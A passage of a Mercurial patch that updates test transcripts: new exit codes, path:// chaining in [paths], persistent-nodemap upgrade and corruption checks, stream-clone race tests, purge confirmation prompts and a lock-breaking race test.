- warning: invalid patchbomb.intro value "mpmwearaclownnose" + warning: invalid patchbomb.intro value "oliviawearaclownnose" (should be one of always, never, auto) -f me*@example.com ~foo/bar@example.com MIME-Version: 1.0 diff --git a/tests/test-pathconflicts-basic.t b/tests/test-pathconflicts-basic.t --- a/tests/test-pathconflicts-basic.t +++ b/tests/test-pathconflicts-basic.t @@ -53,7 +53,7 @@ $ hg up file a: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up --clean file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (activating bookmark file) diff --git a/tests/test-pathconflicts-update.t b/tests/test-pathconflicts-update.t --- a/tests/test-pathconflicts-update.t +++ b/tests/test-pathconflicts-update.t @@ -49,7 +49,7 @@ $ hg up dir a/b: untracked file conflicts with directory abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up dir --config merge.checkunknown=warn a/b: replacing untracked file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -70,7 +70,7 @@ $ hg up dir a/b: untracked file conflicts with directory abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up dir --config merge.checkunknown=warn a/b: replacing untracked file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -89,7 +89,7 @@ $ hg up file a/b: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up file --config merge.checkunknown=warn a/b: replacing untracked files in directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -107,7 +107,7 @@ $ hg up link a/b: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up link 
--config merge.checkunknown=warn a/b: replacing untracked files in directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-paths.t b/tests/test-paths.t --- a/tests/test-paths.t +++ b/tests/test-paths.t @@ -211,3 +211,177 @@ 000000000000 $ cd .. + +Testing path referencing other paths +==================================== + +basic setup +----------- + + $ ls -1 + a + b + gpath1 + suboptions + $ hg init chained_path + $ cd chained_path + $ cat << EOF > .hg/hgrc + > [paths] + > default=../a + > other_default=path://default + > path_with_branch=../branchy#foo + > other_branch=path://path_with_branch + > other_branched=path://path_with_branch#default + > pushdest=../push-dest + > pushdest:pushrev=default + > pushdest2=path://pushdest + > pushdest-overwrite=path://pushdest + > pushdest-overwrite:pushrev=foo + > EOF + + $ hg init ../branchy + $ hg init ../push-dest + $ hg debugbuilddag -R ../branchy '.:base+3<base@foo+5' + $ hg log -G -T '{branch}\n' -R ../branchy + o foo + | + o foo + | + o foo + | + o foo + | + o foo + | + | o default + | | + | o default + | | + | o default + |/ + o default + + + $ hg paths + default = $TESTTMP/a + gpath1 = http://hg.example.com/ + other_branch = $TESTTMP/branchy#foo + other_branched = $TESTTMP/branchy#default + other_default = $TESTTMP/a + path_with_branch = $TESTTMP/branchy#foo + pushdest = $TESTTMP/push-dest + pushdest:pushrev = default + pushdest-overwrite = $TESTTMP/push-dest + pushdest-overwrite:pushrev = foo + pushdest2 = $TESTTMP/push-dest + pushdest2:pushrev = default + +test basic chaining +------------------- + + $ hg path other_default + $TESTTMP/a + $ hg pull default + pulling from $TESTTMP/a + no changes found + $ hg pull other_default + pulling from $TESTTMP/a + no changes found + +test inheritance of the #fragment part +-------------------------------------- + + $ hg pull path_with_branch + pulling from $TESTTMP/branchy + adding changesets + adding manifests + adding file 
changes + added 6 changesets with 0 changes to 0 files + new changesets 1ea73414a91b:bcebb50b77de + (run 'hg update' to get a working copy) + $ hg pull other_branch + pulling from $TESTTMP/branchy + no changes found + $ hg pull other_branched + pulling from $TESTTMP/branchy + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 0 changes to 0 files (+1 heads) + new changesets 66f7d451a68b:2dc09a01254d + (run 'hg heads' to see heads) + +test inheritance of the suboptions +---------------------------------- + + $ hg push pushdest + pushing to $TESTTMP/push-dest + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 0 changes to 0 files + $ hg push pushdest2 + pushing to $TESTTMP/push-dest + searching for changes + no changes found + [1] + $ hg push pushdest-overwrite --new-branch + pushing to $TESTTMP/push-dest + searching for changes + adding changesets + adding manifests + adding file changes + added 5 changesets with 0 changes to 0 files (+1 heads) + +Test chaining path:// definition +-------------------------------- + +This is currently unsupported, but feel free to implement the necessary +dependency detection. 
+ + $ cat << EOF >> .hg/hgrc + > chain_path=path://other_default + > EOF + + $ hg id + 000000000000 + $ hg path + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` + [255] + $ hg pull chain_path + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` + [255] + +Doing an actual circle should always be an issue + + $ cat << EOF >> .hg/hgrc + > rock=path://cissors + > cissors=path://paper + > paper=path://rock + > EOF + + $ hg id + 000000000000 + $ hg path + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` + [255] + $ hg pull chain_path + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` + [255] + +Test basic error cases +---------------------- + + $ cat << EOF > .hg/hgrc + > [paths] + > error-missing=path://unknown + > EOF + $ hg path + abort: cannot use `path://unknown`, "unknown" is not a known path + [255] + $ hg pull error-missing + abort: cannot use `path://unknown`, "unknown" is not a known path + [255] + diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -2,6 +2,9 @@ Test the persistent on-disk nodemap =================================== + +#if no-rust + $ cat << EOF >> $HGRCPATH > [format] > use-persistent-nodemap=yes @@ -9,6 +12,8 @@ > persistent-nodemap=yes > EOF +#endif + $ hg init test-repo --config storage.revlog.persistent-nodemap.slow-path=allow $ cd test-repo @@ -56,11 +61,12 @@ generaldelta: yes share-safe: no sparserevlog: yes - sidedata: no persistent-nodemap: yes copies-sdc: no + revlog-v2: no plain-cl-delta: yes - compression: zlib + compression: zlib (no-zstd !) + compression: zstd (zstd !) 
compression-level: default $ hg debugbuilddag .+5000 --new-file @@ -575,17 +581,19 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: yes no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default - $ hg debugupgraderepo --run --no-backup --quiet + $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) removed: persistent-nodemap processed revlogs: @@ -593,8 +601,17 @@ - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + downgrading repository to not use persistent nodemap feature + removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob) $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' - [1] + 00changelog-*.nd (glob) + 00manifest-*.nd (glob) + undo.backup.00changelog.n + undo.backup.00manifest.n $ hg debugnodemap --metadata @@ -611,29 +628,42 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no yes no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) 
compression-level: default default default - $ hg debugupgraderepo --run --no-backup --quiet + $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) added: persistent-nodemap + persistent-nodemap + Speedup revision lookup by node id. + processed revlogs: - all-filelogs - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + upgrading repository to use persistent nodemap feature + removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob) $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n 00manifest-*.nd (glob) 00manifest.n + undo.backup.00changelog.n + undo.backup.00manifest.n $ hg debugnodemap --metadata uid: * (glob) @@ -649,7 +679,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) 
optimisations: re-delta-all @@ -716,20 +747,88 @@ data-unused: 0 data-unused: 0.000% +Test various corruption cases +============================ + +Missing datafile +---------------- + +Test behavior with a missing datafile + + $ hg clone --quiet --pull test-repo corruption-test-repo + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog-*.nd (glob) + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + $ rm corruption-test-repo/.hg/store/00changelog*.nd + $ hg log -R corruption-test-repo -r . + changeset: 5005:90d5d3ba2fc4 + tag: tip + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a2 + + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + +Truncated data file +------------------- + +Test behavior with a too short datafile + +rebuild the missing data + $ hg -R corruption-test-repo debugupdatecache + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog-*.nd (glob) + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + +truncate the file + + $ datafilepath=`ls corruption-test-repo/.hg/store/00changelog*.nd` + $ f -s $datafilepath + corruption-test-repo/.hg/store/00changelog-*.nd: size=121088 (glob) + $ dd if=$datafilepath bs=1000 count=10 of=$datafilepath-tmp status=none + $ mv $datafilepath-tmp $datafilepath + $ f -s $datafilepath + corruption-test-repo/.hg/store/00changelog-*.nd: size=10000 (glob) + +Check Mercurial's reaction to this event + + $ hg -R corruption-test-repo log -r . 
--traceback + changeset: 5005:90d5d3ba2fc4 + tag: tip + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a2 + + + stream clone ------------- +============ The persistent nodemap should exist after a streaming clone +Simple case +----------- + +No race condition + + $ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)' adding [s] 00manifest.n (70 bytes) - adding [s] 00manifest.i (313 KB) - adding [s] 00manifest.d (452 KB) adding [s] 00manifest-*.nd (118 KB) (glob) adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00manifest.d (491 KB) (zstd !) + adding [s] 00changelog.d (360 KB) (no-zstd !) + adding [s] 00changelog.d (368 KB) (zstd !) + adding [s] 00manifest.i (313 KB) adding [s] 00changelog.i (313 KB) - adding [s] 00changelog.d (360 KB) - adding [s] 00changelog-*.nd (118 KB) (glob) $ ls -1 stream-clone/.hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n @@ -742,3 +841,212 @@ data-length: 121088 data-unused: 0 data-unused: 0.000% + +new data appended +----------------- + +Other commit happening on the server during the stream clone + +setup the step-by-step stream cloning + + $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1" + $ export HG_TEST_STREAM_WALKED_FILE_1 + $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2" + $ export HG_TEST_STREAM_WALKED_FILE_2 + $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3" + $ export HG_TEST_STREAM_WALKED_FILE_3 + $ cat << EOF >> test-repo/.hg/hgrc + > [extensions] + > steps=$RUNTESTDIR/testlib/ext-stream-clone-steps.py + > EOF + +Check and record file state beforehand + + $ f --size test-repo/.hg/store/00changelog* + test-repo/.hg/store/00changelog-*.nd: size=121088 (glob) + test-repo/.hg/store/00changelog.d: size=376891 (zstd !) 
+ test-repo/.hg/store/00changelog.d: size=368890 (no-zstd !) + test-repo/.hg/store/00changelog.i: size=320384 + test-repo/.hg/store/00changelog.n: size=70 + $ hg -R test-repo debugnodemap --metadata | tee server-metadata.txt + uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 + data-unused: 0 + data-unused: 0.000% + +Prepare a commit + + $ echo foo >> test-repo/foo + $ hg -R test-repo/ add test-repo/foo + +Do a mix of clone and commit at the same time so that the file listed on disk differ at actual transfer time. + + $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-1 --debug 2>> clone-output | egrep '00(changelog|manifest)' >> clone-output; touch $HG_TEST_STREAM_WALKED_FILE_3) & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 + $ hg -R test-repo/ commit -m foo + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 + $ cat clone-output + adding [s] 00manifest.n (70 bytes) + adding [s] 00manifest-*.nd (118 KB) (glob) + adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00manifest.d (491 KB) (zstd !) + adding [s] 00changelog.d (360 KB) (no-zstd !) + adding [s] 00changelog.d (368 KB) (zstd !) + adding [s] 00manifest.i (313 KB) + adding [s] 00changelog.i (313 KB) + +Check the result state + + $ f --size stream-clone-race-1/.hg/store/00changelog* + stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) + stream-clone-race-1/.hg/store/00changelog.d: size=368890 (no-zstd !) + stream-clone-race-1/.hg/store/00changelog.d: size=376891 (zstd !) 
+ stream-clone-race-1/.hg/store/00changelog.i: size=320384 + stream-clone-race-1/.hg/store/00changelog.n: size=70 + + $ hg -R stream-clone-race-1 debugnodemap --metadata | tee client-metadata.txt + uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 + data-unused: 0 + data-unused: 0.000% + +We get a usable nodemap, so no rewrite would be needed and the metadata should be identical +(ie: the following diff should be empty) + +This isn't the case for the `no-rust` `no-pure` implementation as it uses a very minimal nodemap implementation that unconditionally rewrites the nodemap "all the time". + +#if no-rust no-pure + $ diff -u server-metadata.txt client-metadata.txt + --- server-metadata.txt * (glob) + +++ client-metadata.txt * (glob) + @@ -1,4 +1,4 @@ + -uid: * (glob) + +uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 + [1] +#else + $ diff -u server-metadata.txt client-metadata.txt +#endif + + +Clean up after the test. + + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_1" + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_2" + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_3" + +full regeneration +----------------- + +A full nodemap is generated + +(ideally this test would append enough data to make sure the nodemap data file +gets changed, however to make things simpler we will force the regeneration for +this test.) + +Check the initial state + + $ f --size test-repo/.hg/store/00changelog* + test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !) + test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !) + test-repo/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !) + test-repo/.hg/store/00changelog.d: size=376950 (zstd !) + test-repo/.hg/store/00changelog.d: size=368949 (no-zstd !) 
+ test-repo/.hg/store/00changelog.i: size=320448 + test-repo/.hg/store/00changelog.n: size=70 + $ hg -R test-repo debugnodemap --metadata | tee server-metadata-2.txt + uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121344 (rust !) + data-length: 121344 (pure !) + data-length: 121152 (no-rust no-pure !) + data-unused: 192 (rust !) + data-unused: 192 (pure !) + data-unused: 0 (no-rust no-pure !) + data-unused: 0.158% (rust !) + data-unused: 0.158% (pure !) + data-unused: 0.000% (no-rust no-pure !) + +Perform the mix of clone and full refresh of the nodemap, so that the files +(and filenames) are different between listing time and actual transfer time. + + $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-2 --debug 2>> clone-output-2 | egrep '00(changelog|manifest)' >> clone-output-2; touch $HG_TEST_STREAM_WALKED_FILE_3) & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 + $ rm test-repo/.hg/store/00changelog.n + $ rm test-repo/.hg/store/00changelog-*.nd + $ hg -R test-repo/ debugupdatecache + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 + $ cat clone-output-2 + adding [s] 00manifest.n (70 bytes) + adding [s] 00manifest-*.nd (118 KB) (glob) + adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) + adding [s] 00manifest.d (492 KB) (zstd !) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00changelog.d (360 KB) (no-zstd !) + adding [s] 00changelog.d (368 KB) (zstd !) + adding [s] 00manifest.i (313 KB) + adding [s] 00changelog.i (313 KB) + +Check the result. + + $ f --size stream-clone-race-2/.hg/store/00changelog* + stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !) + stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !) 
+ stream-clone-race-2/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !) + stream-clone-race-2/.hg/store/00changelog.d: size=376950 (zstd !) + stream-clone-race-2/.hg/store/00changelog.d: size=368949 (no-zstd !) + stream-clone-race-2/.hg/store/00changelog.i: size=320448 + stream-clone-race-2/.hg/store/00changelog.n: size=70 + + $ hg -R stream-clone-race-2 debugnodemap --metadata | tee client-metadata-2.txt + uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121344 (rust !) + data-unused: 192 (rust !) + data-unused: 0.158% (rust !) + data-length: 121152 (no-rust no-pure !) + data-unused: 0 (no-rust no-pure !) + data-unused: 0.000% (no-rust no-pure !) + data-length: 121344 (pure !) + data-unused: 192 (pure !) + data-unused: 0.158% (pure !) + +We get a usable nodemap, so no rewrite would be needed and the metadata should be identical +(ie: the following diff should be empty) + +This isn't the case for the `no-rust` `no-pure` implementation as it uses a very minimal nodemap implementation that unconditionally rewrites the nodemap "all the time". 
+ +#if no-rust no-pure + $ diff -u server-metadata-2.txt client-metadata-2.txt + --- server-metadata-2.txt * (glob) + +++ client-metadata-2.txt * (glob) + @@ -1,4 +1,4 @@ + -uid: * (glob) + +uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121152 + [1] +#else + $ diff -u server-metadata-2.txt client-metadata-2.txt +#endif + +Clean up after the test + + $ rm -f $HG_TEST_STREAM_WALKED_FILE_1 + $ rm -f $HG_TEST_STREAM_WALKED_FILE_2 + $ rm -f $HG_TEST_STREAM_WALKED_FILE_3 + diff --git a/tests/test-phabricator.t b/tests/test-phabricator.t --- a/tests/test-phabricator.t +++ b/tests/test-phabricator.t @@ -48,7 +48,7 @@ options: (use 'hg debugcallconduit -h' to show more help) - [255] + [10] $ hg phabread abort: empty DREVSPEC set [255] diff --git a/tests/test-phases.t b/tests/test-phases.t --- a/tests/test-phases.t +++ b/tests/test-phases.t @@ -757,7 +757,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/store/phaseroots.pending.saved .hg/store/phaseroots.pending (check (in)visibility of phaseroot while transaction running in repo) @@ -780,7 +780,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Check that pretxnclose-phase hook can control phase movement @@ -854,12 +854,12 @@ transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ hg phase --public a603bfb5a83e transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ hg phase --draft 17a481b3bccb test-debug-phase: move rev 3: 2 -> 1 test-debug-phase: move rev 4: 2 -> 1 @@ -871,7 +871,7 @@ transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ cd .. @@ -886,6 +886,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog store @@ -913,6 +915,8 @@ fncache generaldelta internal-phase + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-pull-bundle.t b/tests/test-pull-bundle.t --- a/tests/test-pull-bundle.t +++ b/tests/test-pull-bundle.t @@ -185,7 +185,7 @@ adding changesets adding manifests adding file changes - abort: 00changelog.i@66f7d451a68b: no node + abort: 00changelog.i@66f7d451a68b85ed82ff5fcc254daf50c74144bd: no node [50] $ cd .. $ killdaemons.py diff --git a/tests/test-pull.t b/tests/test-pull-network.t rename from tests/test-pull.t rename to tests/test-pull-network.t --- a/tests/test-pull.t +++ b/tests/test-pull-network.t @@ -81,21 +81,6 @@ abort: unknown revision 'ffffffffffff' [255] -Issue622: hg init && hg pull -u URL doesn't checkout default branch - - $ cd .. - $ hg init empty - $ cd empty - $ hg pull -u ../test - pulling from ../test - requesting all changes - adding changesets - adding manifests - adding file changes - added 1 changesets with 1 changes to 1 files - new changesets 340e38bdcde4 - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved - Test 'file:' uri handling: $ hg pull -q file://../test-does-not-exist diff --git a/tests/test-pull-update.t b/tests/test-pull-update.t --- a/tests/test-pull-update.t +++ b/tests/test-pull-update.t @@ -246,3 +246,25 @@ active-before-pull 3:483b76ad4309 $ cd .. + +Issue622: hg init && hg pull -u URL doesn't checkout default branch + + $ hg init test + $ cd test + $ echo foo>foo + $ hg addremove + adding foo + $ hg commit -m 1 + $ cd .. 
+ + $ hg init empty + $ cd empty + $ hg pull -u ../test + pulling from ../test + requesting all changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 340e38bdcde4 + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-purge.t b/tests/test-purge.t --- a/tests/test-purge.t +++ b/tests/test-purge.t @@ -1,8 +1,3 @@ - $ cat <<EOF >> $HGRCPATH - > [extensions] - > purge = - > EOF - init $ hg init t @@ -18,11 +13,35 @@ $ echo 'ignored' > .hgignore $ hg ci -qAmr3 -d'2 0' +purge without the extension + + $ hg st + $ touch foo + $ hg purge + permanently delete 1 unkown files? (yN) n + abort: removal cancelled + [250] + $ hg st + ? foo + $ hg purge --no-confirm + $ hg st + +now enabling the extension + + $ cat <<EOF >> $HGRCPATH + > [extensions] + > purge = + > EOF + delete an empty directory $ mkdir empty_dir $ hg purge -p -v empty_dir + $ hg purge --confirm + permanently delete at least 1 empty directories? (yN) n + abort: removal cancelled + [250] $ hg purge -v removing directory empty_dir $ ls -A @@ -62,6 +81,10 @@ $ hg purge -p untracked_file untracked_file_readonly + $ hg purge --confirm + permanently delete 2 unkown files? (yN) n + abort: removal cancelled + [250] $ hg purge -v removing file untracked_file removing file untracked_file_readonly @@ -121,6 +144,10 @@ $ cd directory $ hg purge -p ../untracked_directory untracked_directory/nested_directory + $ hg purge --confirm + permanently delete 1 unkown files? (yN) n + abort: removal cancelled + [250] $ hg purge -v ../untracked_directory removing directory untracked_directory/nested_directory removing directory untracked_directory @@ -138,6 +165,7 @@ $ touch ignored $ hg purge -p + $ hg purge --confirm $ hg purge -v $ touch untracked_file $ ls @@ -147,6 +175,10 @@ untracked_file $ hg purge -p -i ignored + $ hg purge --confirm -i + permanently delete 1 ignored files? 
(yN) n + abort: removal cancelled + [250] $ hg purge -v -i removing file ignored $ ls -A @@ -159,6 +191,10 @@ $ hg purge -p --all ignored untracked_file + $ hg purge --confirm --all + permanently delete 1 unkown and 1 ignored files? (yN) n + abort: removal cancelled + [250] $ hg purge -v --all removing file ignored removing file untracked_file diff --git a/tests/test-racy-mutations.t b/tests/test-racy-mutations.t new file mode 100644 --- /dev/null +++ b/tests/test-racy-mutations.t @@ -0,0 +1,102 @@ +#testcases skip-detection fail-if-detected + +Test situations that "should" only be reproducible: +- on networked filesystems, or +- user using `hg debuglocks` to eliminate the lock file, or +- something (that doesn't respect the lock file) writing to the .hg directory +while we're running + + $ hg init a + $ cd a + + $ cat > "$TESTTMP/waitlock_editor.sh" <<EOF + > [ -n "\${WAITLOCK_ANNOUNCE:-}" ] && touch "\${WAITLOCK_ANNOUNCE}" + > f="\${WAITLOCK_FILE}" + > start=\`date +%s\` + > timeout=5 + > while [ \\( ! -f \$f \\) -a \\( ! -L \$f \\) ]; do + > now=\`date +%s\` + > if [ "\`expr \$now - \$start\`" -gt \$timeout ]; then + > echo "timeout: \$f was not created in \$timeout seconds (it is now \$(date +%s))" + > exit 1 + > fi + > sleep 0.1 + > done + > if [ \$# -gt 1 ]; then + > cat "\$@" + > fi + > EOF + $ chmod +x "$TESTTMP/waitlock_editor.sh" + +Things behave differently if we don't already have a 00changelog.i file when +this all starts, so let's make one. 
+ + $ echo r0 > r0 + $ hg commit -qAm 'r0' + +Start an hg commit that will take a while + $ EDITOR_STARTED="$(pwd)/.editor_started" + $ MISCHIEF_MANAGED="$(pwd)/.mischief_managed" + $ JOBS_FINISHED="$(pwd)/.jobs_finished" + +#if fail-if-detected + $ cat >> .hg/hgrc << EOF + > [debug] + > revlog.verifyposition.changelog = fail + > EOF +#endif + + $ echo foo > foo + $ (WAITLOCK_ANNOUNCE="${EDITOR_STARTED}" \ + > WAITLOCK_FILE="${MISCHIEF_MANAGED}" \ + > HGEDITOR="$TESTTMP/waitlock_editor.sh" \ + > hg commit -qAm 'r1 (foo)' --edit foo > .foo_commit_out 2>&1 ; touch "${JOBS_FINISHED}") & + +Wait for the "editor" to actually start + $ WAITLOCK_FILE="${EDITOR_STARTED}" "$TESTTMP/waitlock_editor.sh" + +Break the locks, and make another commit. + $ hg debuglocks -LW + $ echo bar > bar + $ hg commit -qAm 'r2 (bar)' bar + $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 + +Awaken the editor from that first commit + $ touch "${MISCHIEF_MANAGED}" +And wait for it to finish + $ WAITLOCK_FILE="${JOBS_FINISHED}" "$TESTTMP/waitlock_editor.sh" + +#if skip-detection +(Ensure there was no output) + $ cat .foo_commit_out +And observe a corrupted repository -- rev 2's linkrev is 1, which should never +happen for the changelog (the linkrev should always refer to itself). + $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 + 2 1 ac80e6205bb2 222799e2f90b 000000000000 +#endif + +#if fail-if-detected + $ cat .foo_commit_out + transaction abort! + rollback completed + note: commit message saved in .hg/last-message.txt + note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it + abort: 00changelog.i: file cursor at position 249, expected 121 +And no corruption in the changelog. 
+ $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 +And, because of transactions, there's none in the manifestlog either. + $ hg debugrevlogindex -m + rev linkrev nodeid p1 p2 + 0 0 7b7020262a56 000000000000 000000000000 + 1 1 ad3fe36d86d9 7b7020262a56 000000000000 +#endif + diff --git a/tests/test-rebase-abort.t b/tests/test-rebase-abort.t --- a/tests/test-rebase-abort.t +++ b/tests/test-rebase-abort.t @@ -95,6 +95,7 @@ ancestor path: common (node de0a666fdd9c1a0b0698b90d85064d8bd34f74b6) other path: common (node 2f6411de53677f6f1048fef5bf888d67a342e0a5) extra: ancestorlinknode = 3163e20567cc93074fbb7a53c8b93312e59dbf2c + extra: merged = yes $ hg resolve -l U common diff --git a/tests/test-rebase-collapse.t b/tests/test-rebase-collapse.t --- a/tests/test-rebase-collapse.t +++ b/tests/test-rebase-collapse.t @@ -134,7 +134,7 @@ $ hg rebase --base B -m 'custom message' abort: message can only be specified with collapse - [255] + [10] $ cat > $TESTTMP/checkeditform.sh <<EOF > env | grep HGEDITFORM @@ -180,7 +180,7 @@ $ hg rebase -s C --dest H --collapse abort: unable to collapse on top of 3, there is more than one external parent: 1, 6 - [255] + [20] Rebase and collapse - E onto H: @@ -386,7 +386,7 @@ BROKEN: should be allowed $ hg rebase --collapse -r 'B+D+F' -d G abort: unable to collapse on top of 2, there is more than one external parent: 3, 5 - [255] + [20] $ cd .. @@ -404,7 +404,7 @@ 